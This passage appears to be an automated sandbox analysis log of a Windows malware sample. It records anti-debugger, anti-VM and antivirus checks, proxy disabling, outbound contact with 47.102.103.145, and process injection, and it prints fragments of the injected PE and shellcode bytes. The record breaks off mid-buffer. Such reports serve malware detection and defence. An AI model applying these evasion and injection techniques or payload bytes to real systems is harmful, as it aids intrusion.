wmi ASSOCIATORS OF {Win32_IDEController.DeviceID="PCI\\VEN_8086&DEV_2829&SUBSYS_00000000&REV_02\\3&267A616A&0&68"} WHERE AssocClass = Win32_IDEControllerDevice
wmi ASSOCIATORS OF {Win32_IDEController.DeviceID="PCIIDE\\IDECHANNEL\\4&2617AEAE&0&0"} WHERE AssocClass = Win32_IDEControllerDevice
Network communication
One or more buffers contain an embedded PE file (1 event)
buffer Buffer with sha1: 501b45da2f14fb66a5098cfaa2e35fcd0070956c
Communicates with hosts for which no DNS query was performed (3 events)
host 114.114.114.114
host 8.8.8.8
host 47.102.103.145
Creates an Alternate Data Stream (ADS) (1 event)
file C:\Windows\apppat皷髺!€}滒-?v箕,?R纀"? 奕團v82*餢岨?[唨酸?NP獧8饜2①H 忠J!zp衟??:葧葐m
Allocates execute permission in another process, possibly indicating code injection (4 events)
Time & API Arguments Status Return Repeated
1727545298.031125
NtAllocateVirtualMemory
process_handle: 0x000000e8
base_address: 0x022a0000
region_size: 688128
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 2228
success 0 0
1727545396.703125
NtAllocateVirtualMemory
process_handle: 0x000005e0
base_address: 0x02de0000
region_size: 348160
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.000125
NtAllocateVirtualMemory
process_handle: 0x000005e0
base_address: 0x02d90000
region_size: 348160
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1736
success 0 0
1727545397.266125
NtAllocateVirtualMemory
process_handle: 0x000005e0
base_address: 0x03a30000
region_size: 348160
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1684
success 0 0
Attempts to identify installed AV products by installation directory (1 event)
file C:\Program Files (x86)\AVG\AVG9\dfncfg.dat
Checks for the presence of known debugger and forensic tool windows (15 events)
Time & API Arguments Status Return Repeated
1727545297.37525
FindWindowA
window_name:
class_name: OLLYDBG
failed 0 0
1727545297.922125
FindWindowA
window_name:
class_name: OLLYDBG
failed 0 0
1727545298.984125
FindWindowA
window_name:
class_name: OLLYDBG
failed 0 0
1727545299.609125
FindWindowA
window_name:
class_name: OLLYDBG
failed 0 0
1727545300.594125
FindWindowA
window_name:
class_name: OLLYDBG
failed 0 0
1727545301.688125
FindWindowA
window_name:
class_name: OLLYDBG
failed 0 0
1727545301.969125
FindWindowA
window_name:
class_name: OLLYDBG
failed 0 0
1727545302.578125
FindWindowA
window_name:
class_name: OLLYDBG
failed 0 0
1727545302.641125
FindWindowA
window_name:
class_name: OLLYDBG
failed 0 0
1727545302.813125
FindWindowA
window_name:
class_name: OLLYDBG
failed 0 0
1727545302.828125
FindWindowA
window_name:
class_name: OLLYDBG
failed 0 0
1727545393.391125
FindWindowA
window_name:
class_name: OLLYDBG
failed 0 0
1727545394.719125
FindWindowA
window_name:
class_name: OLLYDBG
failed 0 0
1727545397.453125
FindWindowA
window_name:
class_name: OLLYDBG
failed 0 0
1727545397.531125
FindWindowA
window_name:
class_name: OLLYDBG
failed 0 0
Checks Windows idle time to determine uptime (5 events)
Time & API Arguments Status Return Repeated
1727545412.32825
NtQuerySystemInformation
information_class: 8 (SystemProcessorPerformanceInformation)
failed 3221225476 0
1727545414.45325
NtQuerySystemInformation
information_class: 8 (SystemProcessorPerformanceInformation)
failed 3221225476 0
1727545414.45325
NtQuerySystemInformation
information_class: 8 (SystemProcessorPerformanceInformation)
success 0 0
1727545415.45325
NtQuerySystemInformation
information_class: 8 (SystemProcessorPerformanceInformation)
failed 3221225476 0
1727545415.45325
NtQuerySystemInformation
information_class: 8 (SystemProcessorPerformanceInformation)
success 0 0
Checks the BIOS version, possibly for anti-virtualization (1 event)
registry HKEY_LOCAL_MACHINE\SystemBiosVersion
Creates a service but does not start it (1 event)
Time & API Arguments Status Return Repeated
1727545401.23425
CreateServiceW
service_manager_handle: 0x004c25d8
service_name: ComputerZ_x64
display_name: ComputerZ_x64
desired_access: 983551
service_type: 1
start_type: 3
error_control: 1
service_start_name:
password:
service_handle: 0x00000000
filepath: C:\Program Files (x86)\360\360DrvMgr\ComputerZ_x64.sys
filepath_r: C:\Program Files (x86)\360\360DrvMgr\ComputerZ_x64.sys
failed 0 0
Disables the proxy, possibly for traffic interception (1 event)
Time & API Arguments Status Return Repeated
1727545298.422125
RegSetValueExA
key_handle: 0x00000284
regkey_r: ProxyEnable
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
value: 0
success 0 0
Queries disk information, possibly for anti-virtualization (50 out of 52 events)
Time & API Arguments Status Return Repeated
1727545398.59425
NtCreateFile
file_handle: 0x00000138
desired_access: 0x00100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE)
file_attributes: 0 ()
create_disposition: 1 (FILE_OPEN)
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
filepath: \??\PhysicalDrive0
filepath_r: \??\PhysicalDrive0
status_info: 0 (FILE_SUPERSEDED)
success 0 0
1727545398.59425
DeviceIoControl
input_buffer:
device_handle: 0x00000138
control_code: 2954240 ()
output_buffer: (§Lu~ $ VBOX HARDDISK 1.0VBOX HARDDISK 1.0 42563261663031366337632d3936333532342063
success 1 0
1727545398.59425
NtCreateFile
file_handle: 0x00000138
desired_access: 0xc0100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 128 (FILE_ATTRIBUTE_NORMAL)
create_disposition: 1 (FILE_OPEN)
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
filepath: \??\PhysicalDrive0
filepath_r: \??\PhysicalDrive0
status_info: 1 (FILE_OPENED)
success 0 0
1727545398.75025
NtCreateFile
file_handle: 0x00000234
desired_access: 0x00100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE)
file_attributes: 0 ()
create_disposition: 1 (FILE_OPEN)
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
filepath: \??\PhysicalDrive0
filepath_r: \??\PhysicalDrive0
status_info: 0 (FILE_SUPERSEDED)
success 0 0
1727545398.75025
DeviceIoControl
input_buffer:
device_handle: 0x00000234
control_code: 2954240 ()
output_buffer: (§Lu~ $ VBOX HARDDISK 1.0VBOX HARDDISK 1.0 42563261663031366337632d3936333532342063
success 1 0
1727545398.75025
NtCreateFile
file_handle: 0x00000234
desired_access: 0xc0100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 128 (FILE_ATTRIBUTE_NORMAL)
create_disposition: 1 (FILE_OPEN)
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
filepath: \??\PhysicalDrive0
filepath_r: \??\PhysicalDrive0
status_info: 1 (FILE_OPENED)
success 0 0
1727545402.42225
NtCreateFile
file_handle: 0x00000498
desired_access: 0xc0100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 0 ()
create_disposition: 1 (FILE_OPEN)
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
filepath: \??\PhysicalDrive0
filepath_r: \??\PhysicalDrive0
status_info: 1 (FILE_OPENED)
success 0 0
1727545402.42225
DeviceIoControl
input_buffer:
device_handle: 0x00000498
control_code: 458752 (IOCTL_DISK_GET_DRIVE_GEOMETRY)
output_buffer: Q ÿ?
success 1 0
1727545402.42225
NtCreateFile
file_handle: 0x00000000
desired_access: 0x80100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE)
file_attributes: 0 ()
create_disposition: 1 (FILE_OPEN)
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
share_access: 1 (FILE_SHARE_READ)
filepath: \??\PhysicalDrive0
filepath_r: \??\PhysicalDrive0
status_info: 4294967295 ()
failed 3221225539 0
1727545402.43825
NtCreateFile
file_handle: 0x0000048c
desired_access: 0xc0100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 0 ()
create_disposition: 1 (FILE_OPEN)
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
filepath: \??\Scsi0:
filepath_r: \??\Scsi0:
status_info: 0 (FILE_SUPERSEDED)
success 0 0
1727545402.43825
DeviceIoControl
input_buffer: CSMIALL<®
device_handle: 0x0000048c
control_code: 315400 ()
output_buffer:
failed 0 0
1727545402.43825
DeviceIoControl
input_buffer: CSMIARY< d
device_handle: 0x0000048c
control_code: 315400 ()
output_buffer:
failed 0 0
1727545402.43825
DeviceIoControl
input_buffer: CSMISAS<
device_handle: 0x0000048c
control_code: 315400 ()
output_buffer:
failed 0 0
1727545402.43825
DeviceIoControl
input_buffer: CSMIALL<®
device_handle: 0x00000740
control_code: 315400 ()
output_buffer:
failed 0 0
1727545402.43825
DeviceIoControl
input_buffer: CSMIARY< d
device_handle: 0x00000740
control_code: 315400 ()
output_buffer:
failed 0 0
1727545402.43825
DeviceIoControl
input_buffer: CSMISAS<
device_handle: 0x00000740
control_code: 315400 ()
output_buffer:
failed 0 0
1727545402.43825
NtCreateFile
file_handle: 0x00000478
desired_access: 0xc0100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 0 ()
create_disposition: 1 (FILE_OPEN)
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
filepath: \??\Scsi0:
filepath_r: \??\Scsi0:
status_info: 0 (FILE_SUPERSEDED)
success 0 0
1727545402.43825
DeviceIoControl
input_buffer: LSILOGIC¼
device_handle: 0x00000478
control_code: 315400 ()
output_buffer:
failed 0 0
1727545402.43825
DeviceIoControl
input_buffer: LSILOGIC¼
device_handle: 0x00000478
control_code: 315400 ()
output_buffer:
failed 0 0
1727545402.46925
NtCreateFile
file_handle: 0x00000478
desired_access: 0xc0100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 0 ()
create_disposition: 1 (FILE_OPEN)
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
filepath: \??\PhysicalDrive0
filepath_r: \??\PhysicalDrive0
status_info: 1 (FILE_OPENED)
success 0 0
1727545402.46925
NtCreateFile
file_handle: 0x00000478
desired_access: 0xc0100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 0 ()
create_disposition: 1 (FILE_OPEN)
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
filepath: \??\PhysicalDrive0
filepath_r: \??\PhysicalDrive0
status_info: 1 (FILE_OPENED)
success 0 0
1727545402.46925
NtCreateFile
file_handle: 0x00000740
desired_access: 0xc0100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 0 ()
create_disposition: 1 (FILE_OPEN)
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
filepath: \??\PhysicalDrive0
filepath_r: \??\PhysicalDrive0
status_info: 1 (FILE_OPENED)
success 0 0
1727545402.48425
NtCreateFile
file_handle: 0x00000740
desired_access: 0xc0100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 0 ()
create_disposition: 1 (FILE_OPEN)
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
filepath: \??\PhysicalDrive0
filepath_r: \??\PhysicalDrive0
status_info: 1 (FILE_OPENED)
success 0 0
1727545402.50025
NtCreateFile
file_handle: 0x000005ec
desired_access: 0xc0100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 0 ()
create_disposition: 1 (FILE_OPEN)
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
filepath: \??\Scsi0:
filepath_r: \??\Scsi0:
status_info: 0 (FILE_SUPERSEDED)
success 0 0
1727545402.50025
DeviceIoControl
input_buffer: SCSIDISKì
device_handle: 0x000005ec
control_code: 315400 ()
output_buffer:
failed 0 0
1727545402.50025
NtCreateFile
file_handle: 0x000005ec
desired_access: 0xc0100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 0 ()
create_disposition: 1 (FILE_OPEN)
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
filepath: \??\Scsi0:
filepath_r: \??\Scsi0:
status_info: 0 (FILE_SUPERSEDED)
success 0 0
1727545402.50025
DeviceIoControl
input_buffer: SCSIDISKì
device_handle: 0x000005ec
control_code: 315400 ()
output_buffer:
failed 0 0
1727545402.50025
NtCreateFile
file_handle: 0x000005ec
desired_access: 0xc0100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 0 ()
create_disposition: 1 (FILE_OPEN)
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
filepath: \??\Scsi0:
filepath_r: \??\Scsi0:
status_info: 0 (FILE_SUPERSEDED)
success 0 0
1727545402.50025
DeviceIoControl
input_buffer: SCSIDISKì
device_handle: 0x000005ec
control_code: 315400 ()
output_buffer:
failed 0 0
1727545402.50025
NtCreateFile
file_handle: 0x000005ec
desired_access: 0xc0100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 0 ()
create_disposition: 1 (FILE_OPEN)
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
filepath: \??\Scsi0:
filepath_r: \??\Scsi0:
status_info: 0 (FILE_SUPERSEDED)
success 0 0
1727545402.50025
DeviceIoControl
input_buffer: SCSIDISKì
device_handle: 0x000005ec
control_code: 315400 ()
output_buffer:
failed 0 0
1727545402.50025
NtCreateFile
file_handle: 0x000005ec
desired_access: 0xc0100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 0 ()
create_disposition: 1 (FILE_OPEN)
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
filepath: \??\Scsi0:
filepath_r: \??\Scsi0:
status_info: 0 (FILE_SUPERSEDED)
success 0 0
1727545402.50025
DeviceIoControl
input_buffer: SCSIDISKì
device_handle: 0x000005ec
control_code: 315400 ()
output_buffer:
failed 0 0
1727545402.50025
NtCreateFile
file_handle: 0x000005ec
desired_access: 0xc0100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 0 ()
create_disposition: 1 (FILE_OPEN)
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
filepath: \??\Scsi0:
filepath_r: \??\Scsi0:
status_info: 0 (FILE_SUPERSEDED)
success 0 0
1727545402.50025
DeviceIoControl
input_buffer: SCSIDISKì
device_handle: 0x000005ec
control_code: 315400 ()
output_buffer:
failed 0 0
1727545402.50025
NtCreateFile
file_handle: 0x000005ec
desired_access: 0xc0100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 0 ()
create_disposition: 1 (FILE_OPEN)
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
filepath: \??\Scsi0:
filepath_r: \??\Scsi0:
status_info: 0 (FILE_SUPERSEDED)
success 0 0
1727545402.50025
DeviceIoControl
input_buffer: SCSIDISKì
device_handle: 0x000005ec
control_code: 315400 ()
output_buffer:
failed 0 0
1727545402.50025
NtCreateFile
file_handle: 0x000005ec
desired_access: 0xc0100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 0 ()
create_disposition: 1 (FILE_OPEN)
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
share_access: 3 (FILE_SHARE_READ|FILE_SHARE_WRITE)
filepath: \??\Scsi0:
filepath_r: \??\Scsi0:
status_info: 0 (FILE_SUPERSEDED)
success 0 0
1727545402.50025
DeviceIoControl
input_buffer: SCSIDISKì
device_handle: 0x000005ec
control_code: 315400 ()
output_buffer:
failed 0 0
1727545402.50025
DeviceIoControl
input_buffer: SCSIDISKì
device_handle: 0x000005ec
control_code: 315400 ()
output_buffer:
failed 0 0
1727545402.50025
DeviceIoControl
input_buffer: SCSIDISKì
device_handle: 0x000005ec
control_code: 315400 ()
output_buffer:
failed 0 0
1727545402.50025
DeviceIoControl
input_buffer: SCSIDISKì
device_handle: 0x000005ec
control_code: 315400 ()
output_buffer:
failed 0 0
1727545402.50025
DeviceIoControl
input_buffer: SCSIDISKì
device_handle: 0x000005ec
control_code: 315400 ()
output_buffer:
failed 0 0
1727545402.50025
DeviceIoControl
input_buffer: SCSIDISKì
device_handle: 0x000005ec
control_code: 315400 ()
output_buffer:
failed 0 0
1727545402.50025
DeviceIoControl
input_buffer: SCSIDISKì
device_handle: 0x000005ec
control_code: 315400 ()
output_buffer:
failed 0 0
1727545402.50025
DeviceIoControl
input_buffer: SCSIDISKì
device_handle: 0x000005ec
control_code: 315400 ()
output_buffer:
failed 0 0
1727545402.51625
DeviceIoControl
input_buffer: SCSIDISKì
device_handle: 0x00000530
control_code: 315400 ()
output_buffer:
failed 0 0
1727545402.53125
NtCreateFile
file_handle: 0x000004f0
desired_access: 0x00100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE)
file_attributes: 0 ()
create_disposition: 1 (FILE_OPEN)
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
share_access: 1 (FILE_SHARE_READ)
filepath: \??\PhysicalDrive0
filepath_r: \??\PhysicalDrive0
status_info: 0 (FILE_SUPERSEDED)
success 0 0
1727545402.53125
DeviceIoControl
input_buffer:
device_handle: 0x000004f0
control_code: 2954240 ()
output_buffer:
success 1 0
1727545402.53125
DeviceIoControl
input_buffer:
device_handle: 0x000004f0
control_code: 2954240 ()
output_buffer: (§Lu~ $ VBOX HARDDISK 1.0VBOX HARDDISK 1.0 42563261663031366337632d3936333532342063
success 1 0
Uses CreateRemoteThread to create a thread in a non-child process, indicative of process injection (6 events)
Process injection: process 2228 created a remote thread in non-child process 348
Process injection: process 2228 created a remote thread in non-child process 1736
Process injection: process 2228 created a remote thread in non-child process 1684
Time & API Arguments Status Return Repeated
1727545396.984125
CreateRemoteThread
process_handle: 0x000005e0
stack_size: 0
function_address: 0x02de1360
parameter: 0x00000000
flags: 0
thread_identifier: 0
process_identifier: 348
success 2700 0
1727545397.250125
CreateRemoteThread
process_handle: 0x000005e0
stack_size: 0
function_address: 0x02d91360
parameter: 0x00000000
flags: 0
thread_identifier: 0
process_identifier: 1736
success 2700 0
1727545397.719125
CreateRemoteThread
process_handle: 0x000005e0
stack_size: 0
function_address: 0x03a31360
parameter: 0x00000000
flags: 0
thread_identifier: 0
process_identifier: 1684
success 1692 0
Manipulates the memory of a non-child process, indicative of process injection (8 events)
Process injection: process 2228 manipulated the memory of non-child process 2228
Process injection: process 2228 manipulated the memory of non-child process 348
Process injection: process 2228 manipulated the memory of non-child process 1736
Process injection: process 2228 manipulated the memory of non-child process 1684
Time & API Arguments Status Return Repeated
1727545298.031125
NtAllocateVirtualMemory
process_handle: 0x000000e8
base_address: 0x022a0000
region_size: 688128
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 2228
success 0 0
1727545396.703125
NtAllocateVirtualMemory
process_handle: 0x000005e0
base_address: 0x02de0000
region_size: 348160
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 348
success 0 0
1727545397.000125
NtAllocateVirtualMemory
process_handle: 0x000005e0
base_address: 0x02d90000
region_size: 348160
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1736
success 0 0
1727545397.266125
NtAllocateVirtualMemory
process_handle: 0x000005e0
base_address: 0x03a30000
region_size: 348160
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
protection: 64 (PAGE_EXECUTE_READWRITE)
process_identifier: 1684
success 0 0
Potential code injection by writing to the memory of another process (16 events)
Process injection: process 2228 injected into non-child process 2228
Process injection: process 2228 injected into non-child process 348
Process injection: process 2228 injected into non-child process 1736
Process injection: process 2228 injected into non-child process 1684
Time & API Arguments Status Return Repeated
1727545298.031125
WriteProcessMemory
process_handle: 0x000000e8
base_address: 0x022a0000
process_identifier: 2228
buffer: ÿÿ¸@°º´ Í!¸LÍ!This program cannot be run in DOS mode. $™l‡ÙÝ éŠÝ éŠÝ 銲{FŠÜ 銲{tŠÜ éŠRichÝ éŠL£Â7Nà!  ` P*@@.text `.data  @À.reloc`@(@B
success 1 0
1727545298.031125
WriteProcessMemory
process_handle: 0x000000e8
base_address: 0x022a1000
process_identifier: 2228
buffer: d¡0Vü‹@ ‹p­‹@^ÃÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì‹UWÇEü3ɋÁ‹}®tAëú‰Mø€:‹Eø‰E‹Eüt· iÀ?BÁ€:uï‰Eü…ÀyPR‹Eü‹UfòÀZf3Â%ÿÿÿ‰EüZX‹Eü_‹å]ÂÌÌÌÌU‹ììV‹u‹F<W‹|0x…ÿu _3À^‹å]‹D0|‹L7$‹U þS‹_ ‰Eü‹GÆÎމEø‰Mô…Òyâÿÿÿ+W;Wƒ±‹ëC3҉U;Ws0ëI‹U‹“ÆPèÿÿÿ9E t ‹E@‰E;Grá‹U‹Mô‹Eø;Wtp· Q‹ˆ‹UüÞ׉];Úsz;ßrv3À€;.‰E t @€<.uù‰E ðþÿÿ‰Mü‹}ü‹u‹M 󤯄ðþÿÿ@hwFû ‰E è|þÿÿPèÿÿÿjj•ðþÿÿRÿЋð…öu [_3À^‹å]‹E ÃPèmþÿÿPVèÖþÿÿ‹Ø‹Ã[_^‹å]ÂÌÌÌÌÌÌÌÌÌèX-ÕÃÌÌÌÌU‹ìQ‹ˆ ϋ€¤th…ÀtdÁ‰Eü;Ès[SV‹Qƒê3ö÷Âþÿÿÿv@·Tq‹Â%ÿÇ;Çr‹]ß;Ãsâðú0u‹U ‹AƒèFÑè;ðrËEüI;Èr©^[‹å]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì3ÀV‰Eä‰Eè‰Eì‰Eð‰Eô‰Eø‰Eüè=ÿÿÿ‹ðh]ý5Æpè[ýÿÿPèåýÿÿjMäQVÿЋEè^‹å]ÃÌÌÌÌU‹ìƒì83ÀVWÇEä‰Eè‰Eì‰Eð‰Eô‰Eø‰Eüèèþÿÿ‹ðh]ý5ÆpèýÿÿPèýÿÿjMäQVÿЋ}è3ÀÇEȉẺEЉEԉE؉E܉Eàè¤þÿÿ‹ðh]ý5ÆpèÂüÿÿPèLýÿÿjUÈRVÿЋE̋H<‹DPÇ_^‹å]ÃÌU‹ììPVèaþÿÿ‹ðÆ h—̉uøè|üÿÿPèýÿÿ°þÿÿQhÿЅÀ„[d‹0‹B ‹H‹AWh”È7 PèÔüÿÿVÿЋø‰}ì…ÿ„.3ÀSÇE´‰E¸‰E¼‰EÀ‰EĉEȉEÌèãýÿÿ‹ðh]ý5ÆpèüÿÿPè‹üÿÿjU´RVÿЋE¸‹H<‹tXwPhJ†ÿaèÛûÿÿPèeüÿÿj@h0VjÿЋ؉]ô…Û„µ‹WT‰Uð‹}ô‹uø‹Mðó¤‹uì·V·FD0,…Ò~*‹Hü‰Mô‹Mø‰Mð‹HøˉMü‹}ü‹uð‹Môó¤ƒÀ(Juًuì‹FP‹Ó+V4‹ûRP‹Æè;ýÿÿ‹¾€‹D û‰}ø…À„³d$4hç[ãA‰uüè0ûÿÿPèºûÿÿVÿЋð…öuhwFû èûÿÿPè¡ûÿÿ‹MüVVQÿЋð…öt^ƒt‹?ë‹ûƒ?tG‹hˆ…Ày%ÿÿ‰Eüè×úÿÿPèaûÿÿ‹UüRëD‰Eüè¿úÿÿPèIûÿÿ‹MüQVÿЉƒÇƒ?u¹‹}ø‹G ƒÇ‰}ø…À…Tÿÿÿ‹uì3À‰EЉEԉE؉E܉Eà‰Eä‰EèèEüÿÿ‹øh]ý5ÇpècúÿÿPèíúÿÿjUÐRWÿЋEԋH<‹TX‰Uüèýÿÿ‰Eô‹FPÉEð‹}ð‹uô‹Müó¤‹Mì‹q(óth‹ÅÖ\èúÿÿPè¢úÿÿ•°þÿÿRÿÐÿÖ[_hˆÄÒmèûùÿÿPè…úÿÿjÿÐ^‹å]Ã
success 1 0
1727545298.063125
WriteProcessMemory
process_handle: 0x000000e8
base_address: 0x022f4000
process_identifier: 2228
buffer: ×1œ2ñ253s3ö3”5
success 1 0
1727545396.703125
WriteProcessMemory
process_handle: 0x000005e0
base_address: 0x02de0000
process_identifier: 348
buffer: ÿÿ¸@°º´ Í!¸LÍ!This program cannot be run in DOS mode. $™l‡ÙÝ éŠÝ éŠÝ 銲{FŠÜ 銲{tŠÜ éŠRichÝ éŠL£Â7Nà!  ` P@@.text `.data  @À.reloc`@(@B
success 1 0
1727545396.703125
WriteProcessMemory
process_handle: 0x000005e0
base_address: 0x02de1000
process_identifier: 348
buffer: d¡0Vü‹@ ‹p­‹@^ÃÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì‹UWÇEü3ɋÁ‹}®tAëú‰Mø€:‹Eø‰E‹Eüt· iÀ?BÁ€:uï‰Eü…ÀyPR‹Eü‹UfòÀZf3Â%ÿÿÿ‰EüZX‹Eü_‹å]ÂÌÌÌÌU‹ììV‹u‹F<W‹|0x…ÿu _3À^‹å]‹D0|‹L7$‹U þS‹_ ‰Eü‹GÆÎމEø‰Mô…Òyâÿÿÿ+W;Wƒ±‹ëC3҉U;Ws0ëI‹U‹“ÆPèÿÿÿ9E t ‹E@‰E;Grá‹U‹Mô‹Eø;Wtp· Q‹ˆ‹UüÞ׉];Úsz;ßrv3À€;.‰E t @€<.uù‰E ðþÿÿ‰Mü‹}ü‹u‹M 󤯄ðþÿÿ@hwFû ‰E è|þÿÿPèÿÿÿjj•ðþÿÿRÿЋð…öu [_3À^‹å]‹E ÃPèmþÿÿPVèÖþÿÿ‹Ø‹Ã[_^‹å]ÂÌÌÌÌÌÌÌÌÌèX-ÕÃÌÌÌÌU‹ìQ‹ˆ ϋ€¤th…ÀtdÁ‰Eü;Ès[SV‹Qƒê3ö÷Âþÿÿÿv@·Tq‹Â%ÿÇ;Çr‹]ß;Ãsâðú0u‹U ‹AƒèFÑè;ðrËEüI;Èr©^[‹å]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì3ÀV‰Eä‰Eè‰Eì‰Eð‰Eô‰Eø‰Eüè=ÿÿÿ‹ðh]ý5Æpè[ýÿÿPèåýÿÿjMäQVÿЋEè^‹å]ÃÌÌÌÌU‹ìƒì83ÀVWÇEä‰Eè‰Eì‰Eð‰Eô‰Eø‰Eüèèþÿÿ‹ðh]ý5ÆpèýÿÿPèýÿÿjMäQVÿЋ}è3ÀÇEȉẺEЉEԉE؉E܉Eàè¤þÿÿ‹ðh]ý5ÆpèÂüÿÿPèLýÿÿjUÈRVÿЋE̋H<‹DPÇ_^‹å]ÃÌU‹ììPVèaþÿÿ‹ðÆ h—̉uøè|üÿÿPèýÿÿ°þÿÿQhÿЅÀ„[d‹0‹B ‹H‹AWh”È7 